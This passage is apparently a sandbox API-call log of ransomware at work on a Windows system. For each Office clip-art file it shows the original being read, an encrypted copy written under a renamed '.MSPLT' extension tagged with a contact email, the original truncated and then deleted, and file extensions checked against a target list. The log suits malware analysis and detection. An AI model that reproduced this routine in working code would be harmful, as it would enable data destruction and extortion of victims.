dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0294.509] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=7804) returned 1 [0294.509] CloseHandle (hObject=0x454) returned 1 [0294.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf")) returned 0x220 [0294.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.510] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0294.510] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.510] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.510] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0294.511] GetLastError () returned 0x0 [0294.511] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x1e7c, lpOverlapped=0x0) returned 1 [0294.513] WriteFile (in: hFile=0x4c0, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x1e80, lpOverlapped=0x0) returned 1 [0294.515] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.515] WriteFile (in: hFile=0x4c0, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0294.515] SetEndOfFile (hFile=0x4c0) returned 1 [0294.516] CloseHandle (hObject=0x4c0) returned 1 [0294.520] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.520] SetEndOfFile (hFile=0x454) returned 1 [0294.923] CloseHandle (hObject=0x454) returned 1 [0294.923] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0294.924] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04235_.wmf")) returned 1 [0294.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0294.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0294.925] lstrlenW (lpString=".doc") returned 4 [0294.925] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.925] lstrlenW (lpString=".docx") returned 5 [0294.925] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.925] lstrlenW (lpString=".pdf") returned 4 [0294.925] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.925] lstrlenW (lpString=".xls") returned 4 [0294.925] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.925] lstrlenW (lpString=".xlsx") returned 5 [0294.925] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.925] lstrlenW (lpString=".ppt") returned 4 [0294.925] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0294.925] lstrlenW (lpString=".zip") returned 4 [0294.925] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.925] lstrlenW (lpString=".rar") returned 4 [0294.925] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.925] lstrlenW (lpString=".bz2") returned 4 [0294.926] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.926] lstrlenW (lpString=".7z") returned 3 [0294.926] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0294.926] lstrlenW (lpString=".dbf") returned 4 [0294.926] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0294.926] lstrlenW (lpString=".1cd") returned 4 [0294.926] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0294.926] lstrlenW (lpString=".jpg") returned 4 [0294.926] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0294.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0294.926] lstrlenW (lpString=".doc") returned 4 [0294.926] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.926] lstrlenW (lpString=".docx") returned 5 [0294.926] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.926] lstrlenW (lpString=".pdf") returned 4 [0294.926] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.926] lstrlenW (lpString=".xls") returned 4 [0294.926] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.926] lstrlenW (lpString=".xlsx") returned 5 [0294.926] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.926] lstrlenW (lpString=".ppt") returned 4 [0294.926] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0294.927] lstrlenW (lpString=".zip") returned 4 [0294.927] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.927] lstrlenW (lpString=".rar") returned 4 [0294.927] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.927] lstrlenW (lpString=".bz2") returned 4 [0294.927] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.927] lstrlenW (lpString=".7z") returned 3 [0294.927] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0294.927] lstrlenW (lpString=".dbf") returned 4 [0294.927] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0294.927] lstrlenW (lpString=".1cd") returned 4 [0294.927] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0294.927] lstrlenW (lpString=".jpg") returned 4 [0294.927] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.927] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0294.927] lstrlenW (lpString="AN04269_.WMF") returned 12 [0294.927] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0294.928] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=2016) returned 1 [0294.928] CloseHandle (hObject=0x454) returned 1 [0294.928] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf")) returned 0x220 [0294.929] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.929] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0294.929] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.929] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.929] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0294.930] GetLastError () returned 0x0 [0294.930] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x7e0, lpOverlapped=0x0) returned 1 [0294.932] WriteFile (in: hFile=0x46c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x7f0, lpOverlapped=0x0) returned 1 [0294.934] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.934] WriteFile (in: hFile=0x46c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0294.934] SetEndOfFile (hFile=0x46c) returned 1 [0294.934] CloseHandle (hObject=0x46c) returned 1 [0294.935] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.935] SetEndOfFile (hFile=0x454) returned 1 [0294.939] CloseHandle (hObject=0x454) returned 1 [0294.939] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0294.939] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf")) returned 1 [0294.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0294.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0294.940] lstrlenW (lpString=".doc") returned 4 [0294.940] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.940] lstrlenW (lpString=".docx") returned 5 [0294.940] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.940] lstrlenW (lpString=".pdf") returned 4 [0294.940] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.940] lstrlenW (lpString=".xls") returned 4 [0294.940] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.940] lstrlenW (lpString=".xlsx") returned 5 [0294.940] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.940] lstrlenW (lpString=".ppt") returned 4 [0294.940] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0294.940] lstrlenW (lpString=".zip") returned 4 [0294.940] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.940] lstrlenW (lpString=".rar") returned 4 [0294.941] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.941] lstrlenW (lpString=".bz2") returned 4 [0294.941] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.941] lstrlenW (lpString=".7z") returned 3 [0294.941] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0294.941] lstrlenW (lpString=".dbf") returned 4 [0294.941] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0294.941] lstrlenW (lpString=".1cd") returned 4 [0294.941] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0294.941] lstrlenW (lpString=".jpg") returned 4 [0294.941] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0294.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0294.941] lstrlenW (lpString=".doc") returned 4 [0294.941] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0294.941] lstrlenW (lpString=".docx") returned 5 [0294.941] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0294.941] lstrlenW (lpString=".pdf") returned 4 [0294.941] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0294.941] lstrlenW (lpString=".xls") returned 4 [0294.941] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0294.941] lstrlenW (lpString=".xlsx") returned 5 [0294.941] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0294.941] lstrlenW (lpString=".ppt") returned 4 [0294.941] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0294.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0294.941] lstrlenW (lpString=".zip") returned 4 [0294.941] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0294.941] lstrlenW (lpString=".rar") returned 4 [0294.942] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0294.942] lstrlenW (lpString=".bz2") returned 4 [0294.942] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0294.942] lstrlenW (lpString=".7z") returned 3 [0294.942] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0294.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0294.942] lstrlenW (lpString=".dbf") returned 4 [0294.942] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0294.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0294.942] lstrlenW (lpString=".1cd") returned 4 [0294.942] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0294.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 68 [0294.942] lstrlenW (lpString=".jpg") returned 4 [0294.942] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0294.942] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0294.942] lstrlenW (lpString="AN04323_.WMF") returned 12 [0294.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0294.943] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=2492) returned 1 [0294.943] CloseHandle (hObject=0x454) returned 1 [0294.943] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf")) returned 0x220 [0294.943] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0294.944] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.944] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0294.945] GetLastError () returned 0x0 [0294.945] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x9bc, lpOverlapped=0x0) returned 1 [0294.947] WriteFile (in: hFile=0x46c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x9c0, lpOverlapped=0x0) returned 1 [0294.948] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.948] WriteFile (in: hFile=0x46c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0294.948] SetEndOfFile (hFile=0x46c) returned 1 [0294.948] CloseHandle (hObject=0x46c) returned 1 [0294.955] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.956] SetEndOfFile (hFile=0x454) returned 1 [0294.960] CloseHandle (hObject=0x454) returned 1 [0294.960] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0294.961] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf")) returned 1 [0295.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0295.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0295.097] lstrlenW (lpString=".doc") returned 4 [0295.097] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.097] lstrlenW (lpString=".docx") returned 5 [0295.097] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.097] lstrlenW (lpString=".pdf") returned 4 [0295.097] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.097] lstrlenW (lpString=".xls") returned 4 [0295.097] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.097] lstrlenW (lpString=".xlsx") returned 5 [0295.097] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.097] lstrlenW (lpString=".ppt") returned 4 [0295.097] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0295.097] lstrlenW (lpString=".zip") returned 4 [0295.097] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.097] lstrlenW (lpString=".rar") returned 4 [0295.097] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.097] lstrlenW (lpString=".bz2") returned 4 [0295.098] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.098] lstrlenW (lpString=".7z") returned 3 [0295.098] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0295.098] lstrlenW (lpString=".dbf") returned 4 [0295.098] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0295.098] lstrlenW (lpString=".1cd") returned 4 [0295.098] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0295.098] lstrlenW (lpString=".jpg") returned 4 [0295.098] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0295.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0295.098] lstrlenW (lpString=".doc") returned 4 [0295.098] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0295.098] lstrlenW (lpString=".docx") returned 5 [0295.098] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0295.098] lstrlenW (lpString=".pdf") returned 4 [0295.098] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0295.098] lstrlenW (lpString=".xls") returned 4 [0295.098] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0295.098] lstrlenW (lpString=".xlsx") returned 5 [0295.098] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0295.098] lstrlenW (lpString=".ppt") returned 4 [0295.098] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0295.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0295.099] lstrlenW (lpString=".zip") returned 4 [0295.099] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0295.099] lstrlenW (lpString=".rar") returned 4 [0295.099] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0295.099] lstrlenW (lpString=".bz2") returned 4 [0295.099] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0295.099] lstrlenW (lpString=".7z") returned 3 [0295.099] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0295.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0295.099] lstrlenW (lpString=".dbf") returned 4 [0295.099] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0295.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0295.099] lstrlenW (lpString=".1cd") returned 4 [0295.099] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0295.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 68 [0295.099] lstrlenW (lpString=".jpg") returned 4 [0295.099] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0295.099] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0295.099] lstrlenW (lpString="AN04369_.WMF") returned 12 [0295.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0295.101] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=4808) returned 1 [0295.101] CloseHandle (hObject=0x440) returned 1 [0295.101] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: 